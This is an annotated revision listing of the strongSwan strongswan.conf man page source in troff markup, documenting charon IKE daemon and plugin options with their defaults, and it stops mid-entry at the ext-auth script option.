Annotation of embedaddon/strongswan/conf/strongswan.conf.5.main, revision 1.1.1.2
1.1 misho 1: .TP
2: .BR aikgen.load " []"
3: Plugins to load in ipsec aikgen tool.
4:
5: .TP
6: .BR attest.database " []"
7: File measurement information database URI. If it contains a password, make sure
8: to adjust the permissions of the config file accordingly.
9:
10: .TP
11: .BR attest.load " []"
12: Plugins to load in ipsec attest tool.
13:
14: .TP
15: .B charon
16: .br
17: Options for the charon IKE daemon.
18:
19: .RB "" "Note" ":"
20: Many of the options in this section also apply to
21: .RB "" "charon\-cmd" ""
22: and
23: other
24: .RB "" "charon" ""
25: derivatives. Just use their respective name (e.g.
26: .RB "" "charon\-cmd" ""
27: instead of
28: .RB "" "charon" ")."
29: For many options defaults can be defined
30: in the
31: .RB "" "libstrongswan" ""
32: section.
33:
34: .TP
35: .BR charon.accept_private_algs " [no]"
36: Deliberately violate the IKE standard's requirement and allow the use of private
37: algorithm identifiers, even if the peer implementation is unknown.
38:
39: .TP
40: .BR charon.accept_unencrypted_mainmode_messages " [no]"
41: Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
42:
43: Some implementations send the third Main Mode message unencrypted, probably to
44: find the PSKs for the specified ID for authentication. This is very similar to
45: Aggressive Mode, and has the same security implications: A passive attacker can
46: sniff the negotiated Identity, and start brute forcing the PSK using the HASH
47: payload.
48:
49: It is recommended to keep this option to no, unless you know exactly what the
50: implications are and require compatibility to such devices (for example, some
51: SonicWall boxes).
52:
53: .TP
54: .BR charon.block_threshold " [5]"
55: Maximum number of half\-open IKE_SAs for a single peer IP.
56:
57: .TP
58: .BR charon.cache_crls " [no]"
59: Whether Certificate Revocation Lists (CRLs) fetched via HTTP or LDAP should be
60: saved under a unique file name derived from the public key of the Certification
61: Authority (CA) to
62: .RB "" "/etc/ipsec.d/crls" ""
63: (stroke) or
64: .RB "" "/etc/swanctl/x509crl" ""
65: (vici), respectively.
66:
67: .TP
68: .BR charon.cert_cache " [yes]"
69: Whether relations in validated certificate chains should be cached in memory.
70:
71: .TP
1.1.1.2 ! misho 72: .BR charon.check_current_path " [no]"
! 73: By default, after detecting any changes to interfaces and/or addresses no action
! 74: is taken if the current path to the remote peer still looks usable. Enabling
! 75: this option will use DPD to check if the path actually still works, or, for
! 76: instance, the peer removed the state after a longer phase without connectivity.
! 77: It will also trigger a MOBIKE update if NAT mappings were removed during the
! 78: downtime.
! 79:
! 80: .TP
! 81: .BR charon.cisco_flexvpn " [no]"
! 82: Send the Cisco FlexVPN vendor ID payload, which is required in order to make
! 83: Cisco brand devices allow negotiating a local traffic selector (from
! 84: strongSwan's point of view) that is not the assigned virtual IP address if such
! 85: an address is requested by strongSwan. Sending the Cisco FlexVPN vendor ID
! 86: prevents the peer from narrowing the initiator's local traffic selector and
! 87: allows it to e.g. negotiate a TS of 0.0.0.0/0 == 0.0.0.0/0 instead. This has
! 88: been tested with a "tunnel mode ipsec ipv4" Cisco template but should also work
! 89: for GRE encapsulation.
! 90:
! 91: .TP
1.1 misho 92: .BR charon.cisco_unity " [no]"
93: Send Cisco Unity vendor ID payload (IKEv1 only).
94:
95: .TP
96: .BR charon.close_ike_on_child_failure " [no]"
97: Close the IKE_SA if setup of the CHILD_SA along with IKE_AUTH failed.
98:
99: .TP
100: .BR charon.cookie_threshold " [10]"
101: Number of half\-open IKE_SAs that activate the cookie mechanism.
102:
103: .TP
104: .BR charon.crypto_test.bench " [no]"
105: Benchmark crypto algorithms and order them by efficiency.
106:
107: .TP
108: .BR charon.crypto_test.bench_size " [1024]"
109: Buffer size used for crypto benchmark.
110:
111: .TP
112: .BR charon.crypto_test.bench_time " [50]"
113: Time in ms during which crypto algorithm performance is measured.
114:
115: .TP
116: .BR charon.crypto_test.on_add " [no]"
117: Test crypto algorithms during registration (requires test vectors provided by
118: the
119: .RI "" "test\-vectors" ""
120: plugin).
121:
122: .TP
123: .BR charon.crypto_test.on_create " [no]"
124: Test crypto algorithms on each crypto primitive instantiation.
125:
126: .TP
127: .BR charon.crypto_test.required " [no]"
128: Strictly require at least one test vector to enable an algorithm.
129:
130: .TP
131: .BR charon.crypto_test.rng_true " [no]"
132: Whether to test RNG with TRUE quality; requires a lot of entropy.
133:
134: .TP
135: .BR charon.delete_rekeyed " [no]"
136: Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only). Reduces
137: the number of stale CHILD_SAs in scenarios with a lot of rekeyings. However,
138: this might cause problems with implementations that continue to use rekeyed SAs
139: until they expire.
140:
141: .TP
142: .BR charon.delete_rekeyed_delay " [5]"
143: Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
144: only). To process delayed packets the inbound part of a CHILD_SA is kept
145: installed up to the configured number of seconds after it got replaced during a
146: rekeying. If set to 0 the CHILD_SA will be kept installed until it expires (if
147: no lifetime is set it will be destroyed immediately).
148:
149: .TP
150: .BR charon.dh_exponent_ansi_x9_42 " [yes]"
151: Use ANSI X9.42 DH exponent size or optimum size matched to cryptographic
152: strength.
153:
154: .TP
155: .BR charon.dlopen_use_rtld_now " [no]"
156: Use RTLD_NOW with dlopen when loading plugins and IMV/IMCs to reveal missing
157: symbols immediately.
158:
159: .TP
160: .BR charon.dns1 " []"
161: DNS server assigned to peer via configuration payload (CP).
162:
163: .TP
164: .BR charon.dns2 " []"
165: DNS server assigned to peer via configuration payload (CP).
166:
167: .TP
168: .BR charon.dos_protection " [yes]"
169: Enable Denial of Service protection using cookies and aggressiveness checks.
170:
171: .TP
172: .B charon.filelog
173: .br
174: Section to define file loggers, see LOGGER CONFIGURATION in
175: .RB "" "strongswan.conf" "(5)."
176:
177:
178: .TP
179: .B charon.filelog.<name>
180: .br
181: <name> may be the full path to the log file if it only contains characters
182: permitted in section names. Is ignored if
183: .RI "" "path" ""
184: is specified.
185:
186: .TP
187: .BR charon.filelog.<name>.<subsystem> " [<default>]"
188: Loglevel for a specific subsystem.
189:
190: .TP
191: .BR charon.filelog.<name>.append " [yes]"
192: If this option is enabled log entries are appended to the existing file.
193:
194: .TP
195: .BR charon.filelog.<name>.default " [1]"
196: Specifies the default loglevel to be used for subsystems for which no specific
197: loglevel is defined.
198:
199: .TP
200: .BR charon.filelog.<name>.flush_line " [no]"
201: Enabling this option disables block buffering and enables line buffering.
202:
203: .TP
204: .BR charon.filelog.<name>.ike_name " [no]"
205: Prefix each log entry with the connection name and a unique numerical identifier
206: for each IKE_SA.
207:
208: .TP
1.1.1.2 ! misho 209: .BR charon.filelog.<name>.log_level " [no]"
! 210: Add the log level of each message after the subsystem (e.g. [IKE2]).
! 211:
! 212: .TP
1.1 misho 213: .BR charon.filelog.<name>.path " []"
214: Optional path to the log file. Overrides the section name. Must be used if the
215: path contains characters that aren't allowed in section names.
216:
217: .TP
218: .BR charon.filelog.<name>.time_add_ms " [no]"
219: Adds the milliseconds within the current second after the timestamp (separated
220: by a dot, so
221: .RI "" "time_format" ""
222: should end with %S or %T).
223:
224: .TP
225: .BR charon.filelog.<name>.time_format " []"
226: Prefix each log entry with a timestamp. The option accepts a format string as
227: passed to
228: .RB "" "strftime" "(3)."
229:
230:
231: .TP
232: .BR charon.flush_auth_cfg " [no]"
233: If enabled objects used during authentication (certificates, identities etc.)
234: are released to free memory once an IKE_SA is established. Enabling this might
235: conflict with plugins that later need access to e.g. the used certificates.
236:
237: .TP
238: .BR charon.follow_redirects " [yes]"
239: Whether to follow IKEv2 redirects (RFC 5685).
240:
241: .TP
1.1.1.2 ! misho 242: .BR charon.force_eap_only_authentication " [no]"
! 243: Violate RFC 5998 and use EAP\-only authentication even if the peer did not send
! 244: an EAP_ONLY_AUTHENTICATION notify during IKE_AUTH.
! 245:
! 246: .TP
1.1 misho 247: .BR charon.fragment_size " [1280]"
248: Maximum size (complete IP datagram size in bytes) of a sent IKE fragment when
249: using proprietary IKEv1 or standardized IKEv2 fragmentation, defaults to 1280
250: (use 0 for address family specific default values, which uses a lower value for
251: IPv4). If specified this limit is used for both IPv4 and IPv6.
252:
253: .TP
254: .BR charon.group " []"
255: Name of the group the daemon changes to after startup.
256:
257: .TP
258: .BR charon.half_open_timeout " [30]"
259: Timeout in seconds for connecting IKE_SAs (also see IKE_SA_INIT DROPPING).
260:
261: .TP
262: .BR charon.hash_and_url " [no]"
263: Enable hash and URL support.
264:
265: .TP
266: .BR charon.host_resolver.max_threads " [3]"
267: Maximum number of concurrent resolver threads (they are terminated if unused).
268:
269: .TP
270: .BR charon.host_resolver.min_threads " [0]"
271: Minimum number of resolver threads to keep around.
272:
273: .TP
274: .BR charon.i_dont_care_about_security_and_use_aggressive_mode_psk " [no]"
275: If enabled responders are allowed to use IKEv1 Aggressive Mode with pre\-shared
276: keys, which is discouraged due to security concerns (offline attacks on the
277: openly transmitted hash of the PSK).
278:
279: .TP
280: .BR charon.ignore_acquire_ts " [no]"
281: If this is disabled the traffic selectors from the kernel's acquire events,
282: which are derived from the triggering packet, are prepended to the traffic
283: selectors from the configuration for IKEv2 connection. By enabling this, such
284: specific traffic selectors will be ignored and only the ones in the config will
285: be sent. This always happens for IKEv1 connections as the protocol only supports
286: one set of traffic selectors per CHILD_SA.
287:
288: .TP
289: .BR charon.ignore_routing_tables " []"
290: A space\-separated list of routing tables to be excluded from route lookups.
291:
292: .TP
293: .BR charon.ikesa_limit " [0]"
294: Maximum number of IKE_SAs that can be established at the same time before new
295: connection attempts are blocked.
296:
297: .TP
298: .BR charon.ikesa_table_segments " [1]"
299: Number of exclusively locked segments in the hash table.
300:
301: .TP
302: .BR charon.ikesa_table_size " [1]"
303: Size of the IKE_SA hash table.
304:
305: .TP
306: .B charon.imcv
307: .br
308: Defaults for options in this section can be configured in the
309: .RI "" "libimcv" ""
310: section.
311:
312: .TP
313: .BR charon.imcv.assessment_result " [yes]"
314: Whether IMVs send a standard IETF Assessment Result attribute.
315:
316: .TP
317: .BR charon.imcv.database " []"
318: Global IMV policy database URI. If it contains a password, make sure to adjust
319: the permissions of the config file accordingly.
320:
321: .TP
322: .BR charon.imcv.os_info.default_password_enabled " [no]"
323: Manually set whether a default password is enabled
324:
325: .TP
326: .BR charon.imcv.os_info.name " []"
327: Manually set the name of the client OS (e.g. Ubuntu).
328:
329: .TP
330: .BR charon.imcv.os_info.version " []"
331: Manually set the version of the client OS (e.g. 12.04 i686).
332:
333: .TP
334: .BR charon.imcv.policy_script " [ipsec _imv_policy]"
335: Script called for each TNC connection to generate IMV policies.
336:
337: .TP
338: .BR charon.inactivity_close_ike " [no]"
339: Whether to close IKE_SA if the only CHILD_SA closed due to inactivity.
340:
341: .TP
342: .BR charon.init_limit_half_open " [0]"
343: Limit new connections based on the current number of half open IKE_SAs, see
344: IKE_SA_INIT DROPPING in
345: .RB "" "strongswan.conf" "(5)."
346:
347:
348: .TP
349: .BR charon.init_limit_job_load " [0]"
350: Limit new connections based on the number of jobs currently queued for
351: processing (see IKE_SA_INIT DROPPING).
352:
353: .TP
354: .BR charon.initiator_only " [no]"
355: Causes charon daemon to ignore IKE initiation requests.
356:
357: .TP
358: .BR charon.install_routes " [yes]"
359: Install routes into a separate routing table for established IPsec tunnels.
360:
361: .TP
362: .BR charon.install_virtual_ip " [yes]"
363: Install virtual IP addresses.
364:
365: .TP
366: .BR charon.install_virtual_ip_on " []"
367: The name of the interface on which virtual IP addresses should be installed. If
368: not specified the addresses will be installed on the outbound interface.
369:
370: .TP
371: .BR charon.integrity_test " [no]"
372: Check daemon, libstrongswan and plugin integrity at startup.
373:
374: .TP
375: .BR charon.interfaces_ignore " []"
376: A comma\-separated list of network interfaces that should be ignored, if
377: .RB "" "interfaces_use" ""
378: is specified this option has no effect.
379:
380: .TP
381: .BR charon.interfaces_use " []"
382: A comma\-separated list of network interfaces that should be used by charon. All
383: other interfaces are ignored.
384:
385: .TP
386: .BR charon.keep_alive " [20s]"
387: NAT keep alive interval.
388:
389: .TP
1.1.1.2 ! misho 390: .BR charon.keep_alive_dpd_margin " [0s]"
! 391: Number of seconds the keep alive interval may be exceeded before a DPD is sent
! 392: instead of a NAT keep alive (0 to disable). This is only useful if a clock is
! 393: used that includes time spent suspended (e.g. CLOCK_BOOTTIME).
! 394:
! 395: .TP
1.1 misho 396: .BR charon.leak_detective.detailed " [yes]"
397: Includes source file names and line numbers in leak detective output.
398:
399: .TP
400: .BR charon.leak_detective.usage_threshold " [10240]"
401: Threshold in bytes for leaks to be reported (0 to report all).
402:
403: .TP
404: .BR charon.leak_detective.usage_threshold_count " [0]"
405: Threshold in number of allocations for leaks to be reported (0 to report all).
406:
407: .TP
408: .BR charon.load " []"
409: Plugins to load in the IKE daemon charon.
410:
411: .TP
412: .BR charon.load_modular " [no]"
413: If enabled, the list of plugins to load is determined via the value of the
414: .RI "" "charon.plugins.<name>.load" ""
415: options. In addition to a simple boolean flag that
416: option may take an integer value indicating the priority of a plugin, which
417: would influence the order of a plugin in the plugin list (the default is 1). If
418: two plugins have the same priority their order in the default plugin list is
419: preserved. Enabled plugins not found in that list are ordered alphabetically
420: before other plugins with the same priority.
421:
422: .TP
423: .BR charon.make_before_break " [no]"
424: Initiate IKEv2 reauthentication with a make\-before\-break instead of a
425: break\-before\-make scheme. Make\-before\-break uses overlapping IKE and CHILD_SA
426: during reauthentication by first recreating all new SAs before deleting the old
427: ones. This behavior can be beneficial to avoid connectivity gaps during
428: reauthentication, but requires support for overlapping SAs by the peer.
429: strongSwan can handle such overlapping SAs since version 5.3.0.
430:
431: .TP
432: .BR charon.max_ikev1_exchanges " [3]"
433: Maximum number of IKEv1 phase 2 exchanges per IKE_SA to keep state about and
434: track concurrently.
435:
436: .TP
437: .BR charon.max_packet " [10000]"
438: Maximum packet size accepted by charon.
439:
440: .TP
441: .BR charon.multiple_authentication " [yes]"
442: Enable multiple authentication exchanges (RFC 4739).
443:
444: .TP
445: .BR charon.nbns1 " []"
446: WINS servers assigned to peer via configuration payload (CP).
447:
448: .TP
449: .BR charon.nbns2 " []"
450: WINS servers assigned to peer via configuration payload (CP).
451:
452: .TP
453: .BR charon.plugin.ha.buflen " [2048]"
454: Buffer size for received HA messages. For IKEv1 the public DH factors are also
455: transmitted so depending on the DH group the HA messages can get quite big (the
456: default should be fine up to
457: .RI "" "modp4096" ")."
458:
459:
460: .TP
461: .BR charon.plugins.addrblock.strict " [yes]"
462: If set to yes, a subject certificate without an addrblock extension is rejected
463: if the issuer certificate has such an addrblock extension. If set to no, subject
464: certificates issued without the addrblock extension are accepted without any
465: traffic selector checks and no policy is enforced by the plugin.
466:
467: .TP
468: .BR charon.plugins.android_log.loglevel " [1]"
469: Loglevel for logging to Android specific logger.
470:
471: .TP
472: .B charon.plugins.attr
473: .br
474: Section to specify arbitrary attributes that are assigned to a peer via
475: configuration payload (CP).
476:
477: .TP
478: .BR charon.plugins.attr.<attr> " []"
479: .RB "" "<attr>" ""
480: can be either
481: .RI "" "address" ","
482: .RI "" "netmask" ","
483: .RI "" "dns" ","
484: .RI "" "nbns" ","
485: .RI "" "dhcp" ","
486: .RI "" "subnet" ","
487: .RI "" "split\-include" ","
488: .RI "" "split\-exclude" ""
489: or the numeric identifier of the attribute
490: type. The assigned value can be an IPv4/IPv6 address, a subnet in CIDR notation
491: or an arbitrary value depending on the attribute type. For some attribute types
492: multiple values may be specified as a comma separated list.
493:
494: .TP
495: .BR charon.plugins.attr-sql.crash_recovery " [yes]"
496: Release all online leases during startup. Disable this to share the DB between
497: multiple VPN gateways.
498:
499: .TP
500: .BR charon.plugins.attr-sql.database " []"
501: Database URI for attr\-sql plugin used by charon. If it contains a password, make
502: sure to adjust the permissions of the config file accordingly.
503:
504: .TP
505: .BR charon.plugins.attr-sql.lease_history " [yes]"
506: Enable logging of SQL IP pool leases.
507:
508: .TP
509: .BR charon.plugins.bliss.use_bliss_b " [yes]"
510: Use the enhanced BLISS\-B key generation and signature algorithm.
511:
512: .TP
1.1.1.2 ! misho 513: .BR charon.plugins.botan.internal_rng_only " [no]"
! 514: If enabled, only Botan's internal RNG will be used throughout the plugin.
! 515: Otherwise, and if supported by Botan, rng_t implementations provided by other
! 516: loaded plugins will be used as RNG.
! 517:
! 518: .TP
1.1 misho 519: .BR charon.plugins.bypass-lan.interfaces_ignore " []"
520: A comma\-separated list of network interfaces for which connected subnets should
521: be ignored, if
522: .RB "" "interfaces_use" ""
523: is specified this option has no effect.
524:
525: .TP
526: .BR charon.plugins.bypass-lan.interfaces_use " []"
527: A comma\-separated list of network interfaces for which connected subnets should
528: be considered. All other interfaces are ignored.
529:
530: .TP
531: .BR charon.plugins.certexpire.csv.cron " []"
532: Cron style string specifying CSV export times.
533:
534: .TP
535: .BR charon.plugins.certexpire.csv.empty_string " []"
536: String to use in empty intermediate CA fields.
537:
538: .TP
539: .BR charon.plugins.certexpire.csv.fixed_fields " [yes]"
540: Use a fixed intermediate CA field count.
541:
542: .TP
543: .BR charon.plugins.certexpire.csv.force " [yes]"
544: Force export of all trustchains we have a private key for.
545:
546: .TP
547: .BR charon.plugins.certexpire.csv.format " [%d:%m:%Y]"
548: .RB "" "strftime" "(3)"
549: format string to export expiration dates as.
550:
551: .TP
552: .BR charon.plugins.certexpire.csv.local " []"
553: .RB "" "strftime" "(3)"
554: format string for the CSV file name to export local certificates
555: to.
556:
557: .TP
558: .BR charon.plugins.certexpire.csv.remote " []"
559: .RB "" "strftime" "(3)"
560: format string for the CSV file name to export remote
561: certificates to.
562:
563: .TP
564: .BR charon.plugins.certexpire.csv.separator " [,]"
565: CSV field separator.
566:
567: .TP
568: .BR charon.plugins.coupling.file " []"
569: File to store coupling list to.
570:
571: .TP
572: .BR charon.plugins.coupling.hash " [sha1]"
573: Hashing algorithm to fingerprint coupled certificates.
574:
575: .TP
576: .BR charon.plugins.coupling.max " [1]"
577: Maximum number of coupling entries to create.
578:
579: .TP
580: .BR charon.plugins.curl.redir " [-1]"
581: Maximum number of redirects followed by the plugin, set to 0 to disable
582: following redirects, set to \-1 for no limit.
583:
584: .TP
585: .BR charon.plugins.dhcp.force_server_address " [no]"
586: Always use the configured server address. This might be helpful if the DHCP
587: server runs on the same host as strongSwan, and the DHCP daemon does not listen
588: on the loopback interface. In that case the server cannot be reached via
589: unicast (or even 255.255.255.255) as that would be routed via loopback. Setting
590: this option to yes and configuring the local broadcast address (e.g.
591: 192.168.0.255) as server address might work.
592:
593: .TP
594: .BR charon.plugins.dhcp.identity_lease " [no]"
595: Derive user\-defined MAC address from hash of IKE identity and send client
596: identity DHCP option.
597:
598: .TP
599: .BR charon.plugins.dhcp.interface " []"
600: Interface name the plugin uses for address allocation. The default is to bind to
601: any (0.0.0.0) and let the system decide which way to route the packets to the
602: DHCP server.
603:
604: .TP
605: .BR charon.plugins.dhcp.server " [255.255.255.255]"
606: DHCP server unicast or broadcast IP address.
607:
608: .TP
609: .BR charon.plugins.dhcp.use_server_port " [no]"
610: Use the DHCP server port (67) as source port, instead of the DHCP client port
611: (68), when a unicast server address is configured and the plugin acts as relay
612: agent. When replying in this mode the DHCP server will always send packets to
613: the DHCP server port and if no process binds that port an ICMP port unreachables
614: will be sent back, which might be problematic for some DHCP servers. To avoid
615: that, enabling this option will cause the plugin to bind the DHCP server port to
616: send its requests when acting as relay agent. This is not necessary if a DHCP
617: server is already running on the same host and might even cause conflicts (and
618: since the server port is already bound, ICMPs should not be an issue).
619:
620: .TP
621: .BR charon.plugins.dnscert.enable " [no]"
622: Enable fetching of CERT RRs via DNS.
623:
624: .TP
625: .BR charon.plugins.drbg.max_drbg_requests " [4294967294]"
626: Number of pseudo\-random bit requests from the DRBG before an automatic reseeding
627: occurs.
628:
629: .TP
630: .BR charon.plugins.duplicheck.enable " [yes]"
631: Enable duplicheck plugin (if loaded).
632:
633: .TP
634: .BR charon.plugins.duplicheck.socket " [unix://${piddir}/charon.dck]"
635: Socket provided by the duplicheck plugin.
636:
637: .TP
638: .BR charon.plugins.eap-aka.request_identity " [yes]"
639: .TP
640: .BR charon.plugins.eap-aka-3gpp.seq_check " []"
641: Enable to activate sequence check of the AKA SQN values in order to trigger
642: resync cycles.
643:
644: .TP
645: .BR charon.plugins.eap-aka-3gpp2.seq_check " []"
646: Enable to activate sequence check of the AKA SQN values in order to trigger
647: resync cycles.
648:
649: .TP
650: .BR charon.plugins.eap-dynamic.prefer_user " [no]"
651: If enabled the EAP methods proposed in an EAP\-Nak message sent by the peer are
652: preferred over the methods registered locally.
653:
654: .TP
655: .BR charon.plugins.eap-dynamic.preferred " []"
656: The preferred EAP method(s) to be used. If it is not given the first registered
657: method will be used initially. If a comma separated list is given the methods
658: are tried in the given order before trying the rest of the registered methods.
659:
660: .TP
661: .BR charon.plugins.eap-gtc.backend " [pam]"
662: XAuth backend to be used for credential verification.
663:
664: .TP
665: .BR charon.plugins.eap-peap.fragment_size " [1024]"
666: Maximum size of an EAP\-PEAP packet.
667:
668: .TP
669: .BR charon.plugins.eap-peap.include_length " [no]"
670: Include length in non\-fragmented EAP\-PEAP packets.
671:
672: .TP
673: .BR charon.plugins.eap-peap.max_message_count " [32]"
674: Maximum number of processed EAP\-PEAP packets (0 = no limit).
675:
676: .TP
677: .BR charon.plugins.eap-peap.phase2_method " [mschapv2]"
678: Phase2 EAP client authentication method.
679:
680: .TP
681: .BR charon.plugins.eap-peap.phase2_piggyback " [no]"
682: Phase2 EAP Identity request piggybacked by server onto TLS Finished message.
683:
684: .TP
685: .BR charon.plugins.eap-peap.phase2_tnc " [no]"
686: Start phase2 EAP TNC protocol after successful client authentication.
687:
688: .TP
689: .BR charon.plugins.eap-peap.request_peer_auth " [no]"
690: Request peer authentication based on a client certificate.
691:
692: .TP
693: .BR charon.plugins.eap-radius.accounting " [no]"
694: Send RADIUS accounting information to RADIUS servers.
695:
696: .TP
697: .BR charon.plugins.eap-radius.accounting_close_on_timeout " [yes]"
698: Close the IKE_SA if there is a timeout during interim RADIUS accounting updates.
699:
700: .TP
701: .BR charon.plugins.eap-radius.accounting_interval " [0]"
702: Interval in seconds for interim RADIUS accounting updates, if not specified by
703: the RADIUS server in the Access\-Accept message.
704:
705: .TP
706: .BR charon.plugins.eap-radius.accounting_requires_vip " [no]"
707: If enabled, accounting is disabled unless an IKE_SA has at least one virtual IP.
708: Only for IKEv2, for IKEv1 a virtual IP is strictly necessary.
709:
710: .TP
711: .BR charon.plugins.eap-radius.accounting_send_class " [no]"
712: If enabled, adds the Class attributes received in Access\-Accept message to the
713: RADIUS accounting messages.
714:
715: .TP
716: .BR charon.plugins.eap-radius.class_group " [no]"
717: Use the
718: .RI "" "class" ""
719: attribute sent in the RADIUS\-Accept message as group membership
720: information that is compared to the groups specified in the
721: .RB "" "rightgroups" ""
722: option in
723: .RB "" "ipsec.conf" "(5)."
724:
725:
726: .TP
727: .BR charon.plugins.eap-radius.close_all_on_timeout " [no]"
728: Closes all IKE_SAs if communication with the RADIUS server times out. If it is
729: not set only the current IKE_SA is closed.
730:
731: .TP
732: .BR charon.plugins.eap-radius.dae.enable " [no]"
733: Enables support for the Dynamic Authorization Extension (RFC 5176).
734:
735: .TP
736: .BR charon.plugins.eap-radius.dae.listen " [0.0.0.0]"
737: Address to listen for DAE messages from the RADIUS server.
738:
739: .TP
740: .BR charon.plugins.eap-radius.dae.port " [3799]"
741: Port to listen for DAE requests.
742:
743: .TP
744: .BR charon.plugins.eap-radius.dae.secret " []"
745: Shared secret used to verify/sign DAE messages. If set, make sure to adjust the
746: permissions of the config file accordingly.
747:
748: .TP
749: .BR charon.plugins.eap-radius.eap_start " [no]"
750: Send EAP\-Start instead of EAP\-Identity to start RADIUS conversation.
751:
752: .TP
753: .BR charon.plugins.eap-radius.filter_id " [no]"
754: If the RADIUS
755: .RI "" "tunnel_type" ""
756: attribute with value
757: .RB "" "ESP" ""
758: is received, use the
759: .RI "" "filter_id" ""
760: attribute sent in the RADIUS\-Accept message as group membership
761: information that is compared to the groups specified in the
762: .RB "" "rightgroups" ""
763: option in
764: .RB "" "ipsec.conf" "(5)."
765:
766:
767: .TP
768: .BR charon.plugins.eap-radius.forward.ike_to_radius " []"
769: RADIUS attributes to be forwarded from IKEv2 to RADIUS (can be defined by name
770: or attribute number, a colon can be used to specify vendor\-specific attributes,
771: e.g. Reply\-Message, or 11, or 36906:12).
772:
773: .TP
774: .BR charon.plugins.eap-radius.forward.radius_to_ike " []"
775: Same as
776: .RI "" "charon.plugins.eap\-radius.forward.ike_to_radius" ""
777: but from RADIUS to
778: IKEv2, a strongSwan specific private notify (40969) is used to transmit the
779: attributes.
780:
781: .TP
782: .BR charon.plugins.eap-radius.id_prefix " []"
783: Prefix to EAP\-Identity, some AAA servers use a IMSI prefix to select the EAP
784: method.
785:
786: .TP
787: .BR charon.plugins.eap-radius.nas_identifier " [strongSwan]"
788: NAS\-Identifier to include in RADIUS messages.
789:
790: .TP
791: .BR charon.plugins.eap-radius.port " [1812]"
792: Port of RADIUS server (authentication).
793:
794: .TP
795: .BR charon.plugins.eap-radius.retransmit_base " [1.4]"
796: Base to use for calculating exponential back off.
797:
798: .TP
799: .BR charon.plugins.eap-radius.retransmit_timeout " [2.0]"
800: Timeout in seconds before sending first retransmit.
801:
802: .TP
803: .BR charon.plugins.eap-radius.retransmit_tries " [4]"
804: Number of times to retransmit a packet before giving up.
805:
806: .TP
807: .BR charon.plugins.eap-radius.secret " []"
808: Shared secret between RADIUS and NAS. If set, make sure to adjust the
809: permissions of the config file accordingly.
810:
811: .TP
812: .BR charon.plugins.eap-radius.server " []"
813: IP/Hostname of RADIUS server.
814:
815: .TP
816: .B charon.plugins.eap-radius.servers
817: .br
818: Section to specify multiple RADIUS servers. The
819: .RB "" "nas_identifier" ","
820: .RB "" "secret" ","
821: .RB "" "sockets" ""
822: and
823: .RB "" "port" ""
824: (or
825: .RB "" "auth_port" ")"
826: options can be specified for each
827: server. A server's IP/Hostname can be configured using the
828: .RB "" "address" ""
829: option.
830: The
831: .RB "" "acct_port" ""
832: [1813] option can be used to specify the port used for RADIUS
833: accounting. For each RADIUS server a priority can be specified using the
834: .RB "" "preference" ""
835: [0] option. The retransmission time for each server can set set
836: using
837: .RB "" "retransmit_base" ","
838: .RB "" "retransmit_timeout" ""
839: and
840: .RB "" "retransmit_tries" "."
841:
842:
843: .TP
844: .BR charon.plugins.eap-radius.sockets " [1]"
845: Number of sockets (ports) to use, increase for high load.
846:
847: .TP
848: .BR charon.plugins.eap-radius.station_id_with_port " [yes]"
849: Whether to include the UDP port in the Called\- and Calling\-Station\-Id RADIUS
850: attributes.
851:
852: .TP
853: .B charon.plugins.eap-radius.xauth
854: .br
855: Section to configure multiple XAuth authentication rounds via RADIUS. The
856: subsections define so called authentication profiles with arbitrary names. In
857: each profile section one or more XAuth types can be configured, with an assigned
858: message. For each type a separate XAuth exchange will be initiated and all
859: replies get concatenated into the User\-Password attribute, which then gets
860: verified over RADIUS.
861:
862: Available XAuth types are
863: .RB "" "password" ","
864: .RB "" "passcode" ","
865: .RB "" "nextpin" ","
866: and
867: .RB "" "answer" "."
868: This type is not relevant to strongSwan or the AAA server, but the
869: client may show a different dialog (along with the configured message).
870:
871: To use the configured profiles, they have to be configured in the respective
872: connection in
873: .RB "" "ipsec.conf" "(5)"
874: by appending the profile name, separated by a
875: colon, to the
876: .RB "" "xauth\-radius" ""
877: XAauth backend configuration in
878: .RI "" "rightauth" ""
879: or
880: .RI "" "rightauth2" ","
881: for instance,
882: .RI "" "rightauth2=xauth\-radius:profile" "."
883:
884:
885: .TP
886: .BR charon.plugins.eap-sim.request_identity " [yes]"
887: .TP
888: .BR charon.plugins.eap-simaka-sql.database " []"
889: .TP
890: .BR charon.plugins.eap-simaka-sql.remove_used " [no]"
891: .TP
892: .BR charon.plugins.eap-tls.fragment_size " [1024]"
893: Maximum size of an EAP\-TLS packet.
894:
895: .TP
896: .BR charon.plugins.eap-tls.include_length " [yes]"
897: Include length in non\-fragmented EAP\-TLS packets.
898:
899: .TP
900: .BR charon.plugins.eap-tls.max_message_count " [32]"
901: Maximum number of processed EAP\-TLS packets (0 = no limit).
902:
903: .TP
904: .BR charon.plugins.eap-tnc.max_message_count " [10]"
905: Maximum number of processed EAP\-TNC packets (0 = no limit).
906:
907: .TP
908: .BR charon.plugins.eap-tnc.protocol " [tnccs-2.0]"
909: IF\-TNCCS protocol version to be used
910: .RI "(" "tnccs\-1.1" ","
911: .RI "" "tnccs\-2.0" ","
912: .RI "" "tnccs\-dynamic" ")."
913:
914:
915: .TP
916: .BR charon.plugins.eap-ttls.fragment_size " [1024]"
917: Maximum size of an EAP\-TTLS packet.
918:
919: .TP
920: .BR charon.plugins.eap-ttls.include_length " [yes]"
921: Include length in non\-fragmented EAP\-TTLS packets.
922:
923: .TP
924: .BR charon.plugins.eap-ttls.max_message_count " [32]"
925: Maximum number of processed EAP\-TTLS packets (0 = no limit).
926:
927: .TP
928: .BR charon.plugins.eap-ttls.phase2_method " [md5]"
929: Phase2 EAP client authentication method.
930:
931: .TP
932: .BR charon.plugins.eap-ttls.phase2_piggyback " [no]"
933: Phase2 EAP Identity request piggybacked by server onto TLS Finished message.
934:
935: .TP
936: .BR charon.plugins.eap-ttls.phase2_tnc " [no]"
937: Start phase2 EAP TNC protocol after successful client authentication.
938:
939: .TP
940: .BR charon.plugins.eap-ttls.phase2_tnc_method " [pt]"
941: Phase2 EAP TNC transport protocol
942: .RI "(" "pt" ""
943: as IETF standard or legacy
944: .RI "" "tnc" ")"
945:
946:
947: .TP
948: .BR charon.plugins.eap-ttls.request_peer_auth " [no]"
949: Request peer authentication based on a client certificate.
950:
951: .TP
952: .BR charon.plugins.error-notify.socket " [unix://${piddir}/charon.enfy]"
953: Socket provided by the error\-notify plugin.
954:
955: .TP
956: .BR charon.plugins.ext-auth.script " []"
957: Command to pass to the system shell for peer authorization. Authorization is
